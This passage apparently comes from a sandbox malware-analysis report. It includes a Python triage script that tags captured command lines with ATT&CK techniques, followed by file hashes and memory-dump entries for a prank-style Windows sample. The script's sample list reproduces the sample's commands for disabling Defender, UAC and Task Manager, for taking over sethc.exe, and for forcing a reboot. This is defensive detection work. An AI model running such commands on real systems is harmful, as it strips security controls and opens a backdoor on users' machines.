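        hive, _, rest = tokens[2].partition("\\")
        opts = {args[i]: tokens[i + 2] for i in range(len(args) - 1) if args[i] in ("/v", "/d")}
        return registry_finding(HIVES.get(hive.upper(), hive.upper()) + "\\" + rest,
                                opts.get("/v"), opts.get("/d"), cmdline)
    if exe == "takeown" and "/f" in args[:-1]:
        target = base(tokens[args.index("/f") + 2])
        kind = "watched binary" if target in WATCHED_BINARIES else "file"
        return Finding("T1222.001", f"ownership taken of {kind} {target}", cmdline)
    if exe == "icacls" and len(tokens) > 1:
        # Key on the target, not the switch: the captured lines use '/granted', which icacls
        # rejects (the switch is /grant), so a rule tied to the exact switch would miss them.
        return Finding("T1222.001", f"ACL change attempted on {base(tokens[1])}: "
                       + " ".join(tokens[2:]), cmdline)
    if exe == "sc" and len(tokens) > 2:
        if args[0] == "stop":
            return Finding("T1489", f"service {tokens[2]} stopped", cmdline)
        if args[0] == "config" and "start=disabled" in "".join(args[2:]):
            return Finding("T1562.001", f"service {tokens[2]} disabled at boot", cmdline)
    if exe == "shutdown":
        return Finding("T1529", "shutdown/reboot requested: " + " ".join(args), cmdline)
    if exe in ("wscript", "cscript") and len(tokens) > 1:
        return Finding("T1059.005", f"script host runs {tokens[1]}", cmdline)
    if exe == "cmd" and "\\temp\\" in cmdline.lower() and any(".bat" in a for a in args):
        return Finding("T1059.003", "batch file run from the user's Temp directory", cmdline)
    if exe == "rundll32" and "updateperusersystemparameters" in cmdline.lower():
        return Finding("T1491.001", "desktop parameters reloaded (applies the wallpaper)", cmdline)
    return None


def triage(lines) -> list:
    return [f for f in map(analyze, lines) if f is not None]


def technique_counts(findings) -> dict:
    return dict(Counter(f.technique for f in findings))


# Copied from the report's Processes section (one line per distinct command).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"',
    r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat C:\PerfLogs\windows\exec.exe"',
    r'takeown /f sethc.exe',
    r'icacls "sethc.exe" /granted "Admin":F',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f',
    r'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f',
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f',
    r'reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f',
    r'reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f',
    r'sc stop WinDefend',
    r'sc config WinDefend start=disabled',
    r'timeout /t 0',
    r'shutdown -r -t 0',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f.technique, f.summary)
    print(technique_counts(triage(SAMPLE_CMDLINES)))
```

Run over the whole Processes list it yields one finding per reg, takeown, icacls, sc, shutdown, WScript and rundll32 line and drops the timeout padding. The Policies values the sample sets that are not in POLICY_VALUES (NoFolderOptions, DisableLockWorkstation, NoLogoff, HideFastUserSwitching) fall through to the generic T1112 finding as written; add them to the table to give them a specific label.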

Network

N/A

Files

C:\PerfLogs\windows\warn.vbs

MD5 2f1738d26b35388f87f905ecc98cf408
SHA1 f1d20ac33b739f3d50d30891b743ef4374abbc5f
SHA256 83a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba
SHA512 e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2

C:\PerfLogs\windows\exec.exe

MD5 236f1bc0ecb98edb8efdc31da513e819
SHA1 47cc4e73c0f6d717eba708cf468bf6ecb9970086
SHA256 517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4
SHA512 e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109

C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat

MD5 47814c389b7e63ed5a13aa8dcc435f23
SHA1 06f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7
SHA256 2e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48
SHA512 0cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382

C:\PerfLogs\windows\jumpscare.exe

MD5 5425f894a45d90bac30ff9a34d2ad2f3
SHA1 3d9b9708b4eb917142e7fb59ba61534db2c84e7b
SHA256 5f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2
SHA512 9cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7

C:\PerfLogs\windows\rnbowspam.exe

MD5 e000d863f54529348b39030cbaf19aad
SHA1 9138d2cb83508bf24edee9cb581f60700a1c2b9b
SHA256 5fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea
SHA512 72dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df

C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat

MD5 517cae8cc74a0ef3cff3ca7f7dc1aa34
SHA1 af1538a03dfa1678ab2117c715682527e22f2450
SHA256 a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194
SHA512 8180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573

C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat

MD5 5b094d5e0e750e15ab5628f608756249
SHA1 c73caec179b8baf3833413aaab31c384c48ccd45
SHA256 5ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f
SHA512 5d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d

C:\PerfLogs\windows\rainbow.bat

MD5 9d25a94b77c178f0d19bdd8440aaaade
SHA1 c732a091461e0ebbd69f6f64b70016e13856908c
SHA256 55163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9
SHA512 e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d

C:\PerfLogs\windows\killrunas.vbs

MD5 fb63b21fb318509a75324b1037da7876
SHA1 ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1
SHA256 3917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05
SHA512 03ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1

C:\PerfLogs\windows\logon_overwrte.exe

MD5 f8df0742068fa14d5a4502de32acf41b
SHA1 f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0
SHA256 9eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc
SHA512 e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186

C:\PerfLogs\windows\69rnspam.exe

MD5 727793378d36b60cae54319b2f5e9e4d
SHA1 2171ea2f0ea01b39c71ea216a945816fa9ffe751
SHA256 b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2
SHA512 66855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91

C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt

MD5 a6ef45b0aa8443dfea5daaa1bac6a671
SHA1 b27edc165fd8c892af4442698e623d14dfa87899
SHA256 6ba4272a0155f90dc9ffb4777d0e6d167372dfba847992ba77b6ebfb7d234ac2
SHA512 13762ea017e67b1a5d42684ad149bc7aa32c0dad80bd287868ba401d44bfbe5c13ec1ee7d0ffcbcd88abfebe38bf1e8f9a5142297d5860ddbd7466d619a7b1de

C:\PerfLogs\windows\tape.mp4

MD5 3784764b2a5db2e23e744eaff79f40c8
SHA1 33994de53dcf82b834961421b863181763166954
SHA256 2234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf
SHA512 f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f

memory/1424-110-0x0000000004760000-0x000000000476A000-memory.dmp

memory/1424-108-0x0000000004760000-0x000000000476A000-memory.dmp

memory/1424-129-0x0000000004550000-0x0000000004750000-memory.dmp

memory/1424-138-0x0000000004F90000-0x0000000004F9A000-memory.dmp

memory/1424-128-0x0000000004550000-0x0000000004750000-memory.dmp

memory/1424-163-0x0000000005600000-0x000000000560A000-memory.dmp

memory/1424-162-0x0000000005600000-0x000000000560A000-memory.dmp

memory/1424-125-0x0000000004550000-0x0000000004750000-memory.dmp

memory/1424-107-0x0000000004390000-0x000000000439A000-memory.dmp

memory/1424-106-0x0000000004390000-0x000000000439A000-memory.dmp